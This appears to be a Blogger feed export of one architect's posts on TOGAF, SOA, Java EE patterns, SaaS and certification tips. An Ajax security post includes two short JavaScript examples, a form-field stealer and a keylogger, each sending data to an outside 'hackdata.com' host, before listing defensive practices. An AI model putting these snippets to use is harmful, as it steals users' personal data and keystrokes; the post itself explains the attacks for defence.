tag:blogger.com,1999:blog-92356252024-02-28T10:13:59.050-08:00Gaurav Tripathi's BlogUnknownnoreply@blogger.comBlogger15125tag:blogger.com,1999:blog-9235625.post-13449949639661793012012-05-01T05:46:00.004-07:002012-05-01T05:46:57.135-07:00Gelling Security Architecture with TOGAF<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;">This article describes how to adopt ADM cycle for enterprise security. Also it includes steps for development of security architecture and help enterprise to avoid missing a critical security concern. This article will not focusing on </span><strong style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;">security architecture development methodology</strong><span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;">, but intended to touch point the security architecture task and role, as well as gelling of security objectives for each phase of the ADM. </span><br />
<span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;"><br /></span><br />
<span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;">For more detail, click on </span><a href="http://www.articlesbase.com/information-technology-articles/gelling-security-architecture-with-togaf-5841146.html">http://www.articlesbase.com/information-technology-articles/gelling-security-architecture-with-togaf-5841146.html</a><span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;"> link. </span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-60324082276618931312012-02-23T01:14:00.000-08:002012-02-23T03:48:45.137-08:00Preparing TOGAF 9 Certification<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Georgia, 'Times New Roman', serif;">Last week, I cleared the TOGAF 9 part -2 so now I'm a <a href="https://www.opengroup.org/togaf9/cert/protected/certuploads/45756.pdf" target="_blank">TOGAF 9 Certified</a> :-). Being into the consulting company, it took me around 6-7 months to clear the exam (both part 1 & 2) because of time constrain. Anyways, just sharing my experiences of exam: </span><br />
<span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br />
<span style="font-family: Georgia, 'Times New Roman', serif;">For Part 1: </span><br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Read the TOGAF 9 <a href="http://pubs.opengroup.org/architecture/togaf9-doc/arch/" target="_blank">documentation</a></span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Focus on input & output of each ADM Phases (specially Phase E & F)</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">High level knowledge of steps involved in each ADM Phases</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Technical Reference Model</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Repository </span></li>
</ul>
<br />
<span style="font-family: Georgia, 'Times New Roman', serif;">Part - 2 (though it's a open book) is bit tougher than Part - 1 as it is having scenario questions. Below are topics/section which you should focus:</span><span style="font-family: Georgia, 'Times New Roman', serif;"> </span><br />
<ul>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Read the TOGAF 9 <a href="http://pubs.opengroup.org/architecture/togaf9-doc/arch/" target="_blank">documentation</a></span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Focus on input & output of each ADM Phases </span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">In-depth knowledge of steps involved in each ADM Phases</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Artifacts (catalog, matrices & diagrams) involved in each phases(specially B,C & D)</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Also read the mapping of security architecture with TOGAF</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Iterative processes & guidelines</span></li>
</ul>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif;">Apart from above mentioned points, you can also view the Knotion TOGAF 9 series on YouTube and view other material available on net(togaf presentations etc) </span></div>
</div>Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-9235625.post-15818765507266527832011-08-02T18:35:00.000-07:002011-08-03T02:32:44.471-07:00SOA with TOGAF<div>Many organizations are now facing challenges around keeping pace with current business trends and managing complex systems. So organization are looking for better business agility, better business automation, and better IT alignment to speed their business growth.</div><div><br /></div><div>In most of the cases, SOA helps in simplifying the business and eases communication with different departments. It separates functions into distinct business services - units which can easily be accessible and reusable. SOA focuses on agility and flexibility. The point is to create services that are easily accessible across enterprise and can be consumed in different environments.</div><div><br /></div><div>For more detail, please visit my published article on <a href="http://www.theserverside.com/tip/SOA-with-TOGAF">theserverside</a> website.</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-62099022472257527772011-07-04T23:52:00.000-07:002011-07-22T21:15:07.200-07:00Guide to clear SCEA (OCMJEA) Part 2 & 3Moving forward from <a href="http://visitgaurav.blogspot.com/2010/08/crack-sun-certified-enterprise.html">SCEA part - 1</a>, for part 2 assignment, you need to cover following topics like:<br /><br /><div>1. what is the proposed architecture goals and constraints</div><br /><div></div><br /><div>2. section on use-case view</div><br /><div></div><br /><div>3. section on logical view of proposed architecture</div><br /><div></div><br /><div>4. section on technical view of proposed architecture - This is most important section as you need to cover sub-sections like layers of architecture, each use-case realization with class & sequence diagrams, development view of project including package hierarchy. Also cover the mentioned NFRs in the assignment.</div><br /><div></div><br /><div>5. section on deployment view</div><br /><div></div><br /><div>6. Assumption & Risk - This section is also important as you will going to list doing complete assumption made while designing the system. Also list down the risk like unavailability of application etc.</div><br /><div></div><br /><div>7. Optional, but you can add Annexure (s) depending upon your sections</div><br /><div></div><br /><div>For part 3, you need to answer with respect to NFRs (performance, security, availability etc) mentioned in the assignment. Explain each question with points rather than big paragraph. </div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-9235625.post-63136380397411654322010-12-21T21:26:00.000-08:002010-12-21T22:49:26.177-08:00WebSphere's DynaCache Hibernate Caching Adapter<p style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span">As <b>WebSphere Application Server</b> (especially 6.x) onwards, it supports <b>JPA</b> (Java Persistence APIs). Its default ORM tool is OpenJPA. It also supports easy plugging with other ORM tools. For distributed caching, WAS (WebSphere<a href="http://code.google.com/p/webspherehibernateadapter/w/edit/WebSphere" style="color: rgb(0, 0, 204); ">?</a> Application Server) uses <b>DynaCache</b> for distributed caching and very useful in clustered environment. As it has pluggable caching architecture so any ORM tool can easily gets plugged with the ORM caching adapter.</span></p><p style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span">As Hibernate is very famous and stable ORM tool. But it has an issues with WAS as it doesn't have a Hibernate caching adapter to plug with IBM's distributed caching framework.</span></p><p style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span">So I decided to make WebSphere-Hibernate DynaCache adapter so that anyone can easily use the renowned Hibernate ORM.</span></p><p style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span">Please visit</span><span class="Apple-style-span" style="font-size: 13px; "> my project at </span><span class="Apple-style-span" style="font-family: Georgia, serif; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 16px; "><a href="http://code.google.com/p/webspherehibernateadapter/">http://code.google.com/p/webspherehibernateadapter/</a> </span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; "><span class="Apple-style-span">for more detail.</span></span></p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-9235625.post-69723259209421439012010-12-06T05:11:00.000-08:002010-12-07T01:21:11.252-08:00High Scalable and Distributed ArchitectureThis article describes how to achieve high scalability with <a href="http://www.oracle.com/technetwork/java/docs-135218.html">Java EE EJB 3.0</a> and <a href="http://www.springsource.org/">Spring Framework</a>. Also how this hybrid solution can be scalable in a cloud space.<br /><br />In an Enterprise world, Spring Framework with some standard ORM tool like Hibernate gained considerable acceptance as a light-weight architecture for mid size applications. Also in Java EE 5 specification, major changes has been done on component architecture, tried overcome the gaps like IoC, ORM etc.<br /><br />Concept of IoC is still immature in the Java EE 5 and the flexibility, AOP, and relative strengths of Spring and ORM tool like Hibernate to further improve the productivity and quality of any web based applications. As JPA (part of Java EE 5) specification suggest pluggable design so we can use any ORM tool (compatible of JPA) in any application server like IBM WebSphere uses <a href="http://publib.boulder.ibm.com/infocenter/wasinfo/v7r0/index.jsp?topic=/com.ibm.websphere.nd.doc/info/ae/ae/tejb_jpadefaultpp.html">Apache OpenJPA</a> as a default provider but <a href="http://www.hibernate.org/">Hibernate </a>can easily be pluggable.<br /><br />This article demonstrates how to build a highly scalable application with hybrid technology like EJB 3.0, Spring 3.0.x, and Hibernate. Also Spring Framework has its own remoting APIs and options but EJB is a standard specification and can easily be migrated across the application servers.<br />By designing a flexible and component architecture, the application will use the power of EJB 3.0, IoC & APO of Spring 3.0.x and ORM capability of Hibernate.<br /><br />For more detail, visit my published article on <a href="http://www.theserverside.com/tip/High-Scalable-Distributed-Architecture-with-EJB-Spring-Framework">theserverside</a> website.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-9235625.post-8551737573047205122010-09-05T23:59:00.000-07:002010-09-05T23:59:00.341-07:00Ajax and Web Application Security<div style="text-align: left;"><blockquote></blockquote>Now a days, Ajax, <i>meant for increase interactivity, application speed and usability;</i> popularity becomes increasing because it internally uses "JavaScript" language which has a rich user</div><div style="text-align: left;"> interface capability like dynamic form and its properties, pop-up controls, controls on information display, browser properties etc.</div><div><br /></div><div>Ajax uses different web technologies like:</div><div><ul><li>HTML or XHTML: It provide standards for displaying content display </li><li>Cascading Style Sheet (CSS): It also provide standards for displaying content display </li><li>JavaScript: It is a scripting language used for client side browser based applications</li><li>Document Object Model (DOM): It is a standard object model used for displaying dynamic content and related interaction.</li><li>XML and XSLT: It has a capability to manipulate, exchange and transferred data between client and server.</li><li>XML HTML Request (XMLHttpRequest): This client side JavaScript API used for HTTP connect to server and exchange information. Information can be plain text, XML or JSON.</li><li>JavaScript Object Notation (JSON): It is a lightweight, text-based and language independent data exchange format between client and server.</li></ul><div><b><u>How its Works</u></b></div></div><div>Below figure shows the flow of AJAX request:</div><div style="text-align: center;"><br /></div><div style="text-align: center;"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgncStaMkXjM9FA1M-N_tbnOxgDMKQ110JuTGvukF-RnUijnfUcTG1taqLmIaVP8cnvZXK29bpLMDwcrj3DNv00GVlq41n5ngMmvtUywcsiJqa-s6IKC5kqSh_AYxJaVmJqMIAm/s400/Ajax.png" style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 204px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5512243072653499250" /></div><div style="text-align: center;"><br /></div><div><ul><li>User generates an event or some asynchronous event fire at client end and result a JavaScript call</li><li><i>XMLHttpRequest</i> JavaScript object request is created and configured with a request parameter along with event component identifier and user defined values (if any).</li><li>Above object makes a <b>asynchronous</b> call to web / application server. Call may be web-service, servlet, JSF's AJAX component etc.</li><li>Based on request, server may fetch the desired data from data store.</li><li>That data push back to client browser in form of plain text, XML or JSON.</li><li><i>XMLHttpRequest</i> callback method received the data, processes it and updated the HTTP DOM representing the web-page with new information.</li></ul><div><b><u>AJAX Security and Vulnerabilities</u></b></div><div>As AJAX has good UI (usability) capabilities but it has some security holes which makes web application vulnerable. Vulnerability can be at sever side and client side. As information flow between server and client in form of plain text, XML or JSON which eventually exposing server-side APIs and if insufficient security at server-side leads to unauthenticated access of system. Also usage of AJAX increases the chance of session management vulnerabilities and risk of access hidden URLs which are necessary for AJAX request to be processes.</div></div><div><span class="Apple-tab-span" style="white-space:pre"> </span>Another issue with AJAX is visible data. <i>XMLHttpRequest </i>sends the plain visible text to server and may easily reveal database fields like Product Id, Customer Id which can be easily be manipulated by the hacker.</div><div><br /></div><div><b>a.Effects of Attack:</b></div><div><ul><li><b>Hacking Password and Cookies: </b>Hacker can easily manipulate the sensitive information like password, cookies etc by injecting scripts in any part of DOM tree like:</li></ul></div><blockquote><div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">function hackdata() {</span></span></div><div><span class="Apple-tab-span" style="white-space:pre"><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">var data = document.getElementById("ssn").value;</span></span></div><div><span class="Apple-tab-span" style="white-space:pre"><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">document.image[0].src = "http://hackdata.com/hackdata=" + data;</span></span></div><div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">}</span></span></div><div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">document.getElementById("button").onclick = hackdata;</span></span></div><div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;"><blockquote></blockquote></span></span></div></blockquote><blockquote><div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><span class="Apple-style-span" style="font-size: medium; ">Above example shows how hacker can steal the sensitive information.</span><span class="Apple-style-span" style="font-size: medium; ">As soon as user clicks on submit button, a asynchronous request goes to hacker site with sensitive information. With the same approach, hacker can hack the cookies information.</span></blockquote><blockquote><span class="Apple-style-span" style="font-size: medium; "></span></blockquote><span><ul><li><b>Hacking keyboard events:</b> Through key logger or mouse sniffer sensitive information can be captured like:</li></ul><div><span><span><span><span class="Apple-tab-span" style="white-space: pre; "> </span><span class="Apple-style-span" style="font-size: small; color: rgb(255, 102, 102); ">function hackdata(e) {</span><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small; "> <span class="Apple-tab-span" style="white-space: pre; "> </span></span></span></span><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small; ">document.image[0].src = "http://hackdata.com/keydata=" + e.keyCode;</span></span></div><div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small; "><span class="Apple-tab-span" style="white-space: pre; "> </span> }</span></span></div><div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small; "><span class="Apple-tab-span" style="white-space: pre; "> </span> document.body.addEventListener("keyup",hackdata,false);</span></span></div><div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small; "><br /></span></span></div></span></span></span></div><span class="Apple-tab-span" style="white-space:pre"> </span>Same way, mouse event can be steal through mouse sniffer.<br /><b><br /></b></span><div><ul><li><b>Inserting information: </b>Attacker can modify the stylesheet to eliminate sensitive information such as making font color to white. <b> </b></li></ul><span><b><span class="Apple-style-span" style="font-weight: normal; "><b>b.Best Practices:</b></span></b></span></div><div><span><b><span class="Apple-style-span" style="font-weight: normal;">Following are the best practices which need to be follow in AJAX based web application:</span></b></span></div><div><span><b><span class="Apple-style-span" style="font-weight: normal;"><br /></span></b></span></div><div><ul><li>Data Validation: To avoid XSS (Cross Site Scripting), web application must do the input data validation. Input validation and filter out possible active and malicious content from untrusted input source.</li><li>Avoid Dynamic code generation & execution: Try to avoid dynamic code generation such as usage of <i>eval </i>method </li><li>Secure use of JSON: As JSON is subset of JavaScript so it may contain malicious code such as many JavaScript libraries use the <i>eval() </i>method to convert JSON into JavaScript objects. To avoid that use the regular expression defined in RFC 4627 to make sure that JSON doesn't have malicious code. </li><li>Use if "iFrame": Load the different domain data into iframe, which gives the advantage of JavaScript execution context & DOM tree its own. This prevents hacker from hacking from main page<span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 12px; ">. </span></li><li>Use security testing tool: Always use vulnerability checking tool to detect the potential vulnerabilities in advance.</li></ul><div>Above are few best practices which needs to follow to avoid from common AJAX attacks. </div><div></div></div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-9235625.post-30088231981998942802010-09-01T02:06:00.000-07:002010-09-01T23:04:00.622-07:00Messaging and Cloud Computing<div>In today's world, maintaining critical parameter of an application is a big challenge. Parameters like high performance, availability and scalability. This article will explain how to achieve high performance, availability and scalability with messaging technologies, WebSphere Application Server (WAS) and Service Integration Bus (SIB). It also includes hints and best practices and shows how to configure for high availability. Cloud enabler architecture can be achievable with WAS and SIB.</div><div><br /></div><div>For more detail, please visit <b><a href="http://www.theserverside.com/report/IBM-WebSphere-SIB-Cloud-Computing-Leveraging-the-Power">Power of Messaging by IBM WebSphere SIB & Cloud Computing</a></b> link.</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-36287448543022520552010-08-29T22:59:00.000-07:002010-08-30T05:23:23.490-07:00Famous J2EE (Java EE) Design PatternsAs most of my friends and juniors occasionally ask about frequently and popular J2EE patterns. So I thought of listing down patterns which every Java developer or designer should know. I'm dividing patterns into presentation, business and integration tier. <div><br /></div><div><b>List of popular patterns & its usage which comes under </b><i><b>Presentation Tier</b></i><b>: </b></div><div>1. Intercepting Filter: </div><div><ul><li>It can be used when there is a requirement of centralized and common processing across requests</li><li>When pre and post processing is required across or selected requests </li></ul></div><div>2. Front Controller (& Application Controller):</div><div><ul><li>When there is a requirement of common logic to multiple requests</li><li>When there is a requirement of separate processing logic from the presentation view</li><li>When there is a requirement of centralized controlled access points </li></ul></div><div>3. View Helper:</div><div><ul><li>When template based views is required like JSP, Apache Velocity etc</li><li>When separate programming logic from view </li></ul></div><div>4. Service To Worker:</div><div><ul><li>Service To Worker = Front Controller + Application Controller + View Helper</li><li>Any presentation framework like Apache Struts</li></ul></div><div><br /></div><div><b>List of popular patterns </b><b>& its usage </b><b>which comes under </b><i><b>Business Tier</b></i><b>:</b></div><div>1. Business Delegate:</div><div><ul><li>When business-tier access from presentation-tier</li><li>Hides service creation, invocation </li></ul></div><div>2. Service Locator:</div><div><ul><li>Patterns can be used when lookup to any enterprise resource like JNDI lookup, JMS, web services etc</li><li>When requirement of centralized and reuse (cache or reestablish connection) lookup </li></ul></div><div>3. Session Facade:</div><div><ul><li>When requirement is to avoid direct client access to application's business-tier</li><li>When requirement is to hide complex integration of business components</li></ul></div><div>4. Transfer Object:</div><div><ul><li>When requirement is to access component of different tier to retrieve and update data</li><li>When requirement is to reduce remote requests across the tier and network (enhance network performance) </li></ul></div><div>5. Value List Handler:</div><div><ul><li>When requirement is to avoid the overhead of using EJB "finder" methods </li><li>Requirement of an efficient search and iterate searched data</li><li>Cache search result on the server side </li></ul></div><div><br /></div><div><b>List of popular patterns </b><b>& its usage </b><b>which comes under </b><i><b>Integration Tier</b></i><b>:</b></div><div>1. Data Access Object:</div><div><ul><li>Requirement of uniform data access APIs</li><li>Requirement of decouple persistent storage from other tier</li></ul></div><div>2. Service Activator:</div><div><ul><li>Requirement is to call business service, EJBs in an asynchronous manner</li><li>Requirement is to plug topic and point-to-point messaging to enable async process </li></ul></div><div>3. Web Service Broker:</div><div><ul><li>It is like exposing services to client i.e. web service</li></ul><div>Above are main patterns which generally been used in J2EE based application. Some patterns which internally been used by frameworks like Apache Struts and Java EE components like JPA.</div> </div>Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-9235625.post-53485023499439091462010-08-27T03:12:00.000-07:002010-08-29T22:58:23.080-07:00SaaS & Clould Computing - Design ConsiderationDesign a SaaS application is a big challenge. There are lots of dimension which we need to look upon while designing the application like maturity level, business goals, business & architecture principles, operational model etc.<br /><br />According of Microsoft, SaaS application has a four <a href="http://msdn.microsoft.com/en-us/library/aa479069.aspx">maturity levels</a>:<br />1. <span style="font-weight: bold;">Ad Hoc/Custom</span>: Each client or tenant has its own server instance and application code as modified to meet their requirements.<br /><br />2. <span style="font-weight: bold;">Configurable</span>: In this level, each tenant or client hosts a separate instance of the application for each customer but the code-base remain same for each client i.e. application it quite configurable to support each customer.<br /><br />3. <span style="font-weight: bold;">Configurable, Multi-Tenant-Efficient</span>: Each client or tenant runs on a <span style="font-weight: bold;">single instance</span> that serves every customer, with configurable metadata providing a unique user experience and feature set for each one. Only restriction of this level is that it can not be scalable across servers so performance and availability will be issue of this level.<br /><br />4. <span style="font-weight: bold;">Scalable, Configurable, Multi-Tenant-Efficient: </span>This level multiple client or tenant are supported by the load-balanced farm of identical instances, with each tenant data/information kept separate, and with configurable metadata providing a unique user experience and feature set for each tenant/client.<br /><br />As far as design and flexibility is concern, SaaS application should design for level 4.<br /><br />Following are the design consideration of SaaS application:<br />1. <span style="font-weight: bold;">Multi-Tenancy</span>: Application should be design to handle multi-tenancy like data, UI, business rules etc should be separated per customer.<br /><br />2. <span style="font-weight: bold;">Security</span>: Application design should ensure security of customer data is secure and there should be complete separation of data between customer/tenant. Also authentication should be "pluggable" to customer's enterprise identity management.<br /><br />3. <span style="font-weight: bold;">Availability</span>: Application should be easily scalable and clusterable so that it is available anytime.<br /><span style="font-weight: bold;"></span><br />4. <span style="font-weight: bold;">Scalable</span>: Application design should be highly scalable and it should easily cope large organization and user base.<br /><br />5. <span style="font-weight: bold;">Data Model Extensibility</span>: Database should be easily be tailor to the fulfill the need of each vendor without affecting the others.<br /><br />6. <span style="font-weight: bold;">Flexible Presentation</span>: UI should be highly configurable and flexible so that it able be easily be customizable for each vendor without affecting the others. <br /><br />7. <span style="font-weight: bold;">Performance</span>: Application should have less response time (for complex page also) and transactional processing time.<br /><br />8. <span style="font-weight: bold;">Configurable Business Rule/Process</span>: Application should be design to support addition/customization of individual tenant/companies business rules/processes. Also application should seamlessly integrate with tenant's enterprise business processes.<br /><br />9. <span style="font-weight: bold;">Multi-language Support</span>: Application should internationalization so that different tenant uses across the Internet and around the world.<br /><br />10. <span style="font-weight: bold;">Separation of Concern</span>: Application should be design on concept of SOA and Separation of Concerns so that it can easily be deployed in cloud and cloud-bus can be plugged to communicate with different cloud and on-premises. Also business agility or time-to-market will be other advantage of this design pattern.<br /><br /><br />So, any application follow above design consideration then it can easily get the advantage of maturity "Level 4" and ported in cloud environment.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-20502860277863726632010-08-13T03:26:00.000-07:002010-08-17T06:19:36.445-07:00SaaS and Cloud Computing - An OverviewTo understand <span class="blsp-spelling-error" id="SPELLING_ERROR_0">SaaS</span> in a simple way just think of email offering from Google (as <span class="blsp-spelling-error" id="SPELLING_ERROR_1">gmail</span>) where multiple clients i.e. email id owner can send / receive mails and can use other features provided by the Google.<br /><br /><span class="blsp-spelling-error" id="SPELLING_ERROR_2">Google's</span> mail servers are in Cloud, which can be easily scalable. So this is a perfect example of <span style="font-weight: bold;"><span class="blsp-spelling-error" id="SPELLING_ERROR_3">SaaS</span></span> and <span style="font-weight: bold;">Cloud Computing</span>.<br /><br />Below figure help you in visualizing <span class="blsp-spelling-error" id="SPELLING_ERROR_4">SaaS</span> and Cloud Space:<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbmN78rkpPt4dst9Ob6liLSQFUsOLGevLJmjgLW1Bw4s0a_809JuT6CNHX2dtLz9WCziNpcWM8oaiYZPE88yId2_kDSnU8FDn0a_HrKXN-mxOdbqILUWaAemYj9pXeLd5HNN7V/s1600/SaaS.gif"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 224px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbmN78rkpPt4dst9Ob6liLSQFUsOLGevLJmjgLW1Bw4s0a_809JuT6CNHX2dtLz9WCziNpcWM8oaiYZPE88yId2_kDSnU8FDn0a_HrKXN-mxOdbqILUWaAemYj9pXeLd5HNN7V/s320/SaaS.gif" alt="" id="BLOGGER_PHOTO_ID_5505935890169584434" border="0" /></a>So <span class="blsp-spelling-error" id="SPELLING_ERROR_5">SaaS</span> can be offered as paid service like subscription service. These services can be form of domain specific application such as <span class="blsp-spelling-error" id="SPELLING_ERROR_6">CRM</span>, and <span class="blsp-spelling-error" id="SPELLING_ERROR_7">SCM</span> etc. For more detail, visit <a href="http://www.salesforec.com/">www.salesforce.com</a>. <span style="font-weight: bold;"><span class="blsp-spelling-error" id="SPELLING_ERROR_8">salesforce</span> </span>application has a complete <span class="blsp-spelling-error" id="SPELLING_ERROR_9">CRM</span> solution deployed in his cloud environment. Generally vendor or site user will be charged on usage basis and each <span class="blsp-spelling-error" id="SPELLING_ERROR_10">SaaS</span> provider will has metering capability.<br /><br />Other kind of service like free or partial free services such as web mail services (i.e. <span class="blsp-spelling-error" id="SPELLING_ERROR_11">gmail</span>), job site, etc.<br /><br />Following are the main advantages while adopting <span class="blsp-spelling-error" id="SPELLING_ERROR_12">SaaS</span> option:<br />1. Faster time-to-market<br />2. Cost effective options (in most of case)<br />3. Lower license cost<br />4. Nearly zero maintenance and software upgrade cost<br />5. Good option for start-up companies.<br />6. Pay on usage basis<br /><br />Apart from some good advantages, there are some issues and limitation of <span class="blsp-spelling-error" id="SPELLING_ERROR_13">SaaS</span> application:<br />1. Non-Scalable design: Generally <span class="blsp-spelling-error" id="SPELLING_ERROR_14">SaaS</span> application is expected to handle large customer base and scale seamlessly in cloud but non-scalability nature of <span class="blsp-spelling-error" id="SPELLING_ERROR_15">SaaS</span> application leads deterioration in performance.<br />2. Hidden cost of <span class="blsp-spelling-error" id="SPELLING_ERROR_16">SaaS</span> provider<br />3. Data Security as multiple user/customer will use the same database<br />4. Availability of <span class="blsp-spelling-error" id="SPELLING_ERROR_17">SaaS</span> application<br /><br /><span style="font-weight: bold;">Top <span class="blsp-spelling-error" id="SPELLING_ERROR_18">SaaS</span> Providers:</span><br /><br />There are lots of <span class="blsp-spelling-error" id="SPELLING_ERROR_19">SaaS</span> providers in all the domain areas including <span class="blsp-spelling-error" id="SPELLING_ERROR_20">CRM</span>, <span class="blsp-spelling-error" id="SPELLING_ERROR_21">SCM</span>, Health Care, Retail etc. Following are the market leader in <span class="blsp-spelling-error" id="SPELLING_ERROR_22">SaaS:</span><em></em><span style="font-style: italic;"><br /><br /></span>1. <span style="font-weight: bold;">salesforce</span>: It provide CRM software on-demand. It has various pricing model starting with free subscription, and pay-as-you-go model. Currently they offer two SaaS services:<br /><ul><li>Sales Cloud: It has accounts, contacts, leads, quotes, etc.<br /></li><li>Service Cloud: It has customer portal, knowledge base, and analytics, etc.</li></ul><p>2. <span style="font-weight: bold;">Google</span>: It has range of applications as well as web-based offerings. like e-mail service, calendar, document editor, spreadsheet, and some others.</p><p>3. <span style="font-weight: bold;">Zoho</span>: It has also web-based e-mail service, document editor, presentation tool, invoicing, reporting, applicant tracking, and many more.</p><p>Next topic which I will going to cover is <span style="font-weight: bold;">SaaS & Cloud Computing - Application Design Consideration</span>. </p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-71604192294094404492010-08-12T23:41:00.000-07:002011-07-22T21:12:17.107-07:00Crack Sun Certified Enterprise Architect (SCEA) ExamMost of the aspiring architects frequently asked me "how to clear SCEA (OCMJEA) exam" so I thought to write some basic points and approach to crack this exam. <span style="VISIBILITY: visible" id="main"><span style="VISIBILITY: visible" id="search"></span><br /><br />This certification is very easy to pass if you have the understanding of design patterns. Understanding does not means that you know the definition of patterns, but it means you did some Java EE based application designing in past and applied various patterns. This will going to help you in answering patterns related questions as well as architecture related questions.<br /><br />So if you have above experience then half of your battle won. And if you haven't done then its better to hold your horse and wait for some time .... some application design & apply patterns. "<span style="FONT-WEIGHT: bold">Practical experience is must</span>" .......<br /><br />Other things which you need to study like application security parameters, design consideration of thick client, EJB 3.0 usage, presentation framework, and application integration techniques.<br /><br />Few good study materials are:<br /><span style="font-size:100%;"><br />1. The Java EE 5 Tutorial, Third Edition (http://java.sun.com/javaee/5/docs/tutorial/doc/JavaEETutorial.pdf)<br /><br />2. Core J2EE Patterns: Best Practices and Design Strategies, Second Edition<br /><br />3. Java Design: Objects, UML, and Process<br /><br />4. Designing Enterprise Applications with the J2EE Platform<br /><br />5. Enterprise Integration Patterns<br /><br />6. The Java EE 5Tutorial - For Sun Java System Application Server 9.1<br /><br />7. Sun Certified Enterprise Architect for J2EE Study Guide<br /><br />8. Core Security Patterns: Best Practices and Strategies for J2EE, Web Services, and Identity Management<br /></span></span><span style="font-size:130%;"><span style="LINE-HEIGHT: 115%;font-family:'Verdana', 'sans-serif';font-size:9;color:black;" ></span></span><br /><div><span style="VISIBILITY: visible" id="main"><span style="font-size:100%;"><br /></span></span></div><br /><div><span style="VISIBILITY: visible" id="main"><span style="font-size:100%;">For SCEA Part 2 & 3, refer my next <a href="http://visitgaurav.blogspot.com/2011/07/how-to-clear-scea-part-2-3.html">article</a>.</span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-58980007046493714452009-06-01T19:41:00.000-07:002012-04-19T19:46:12.112-07:00TOGAF 9<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Things to always remember the phases and steps of TOGAF by any Enterprise Architect</span> </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
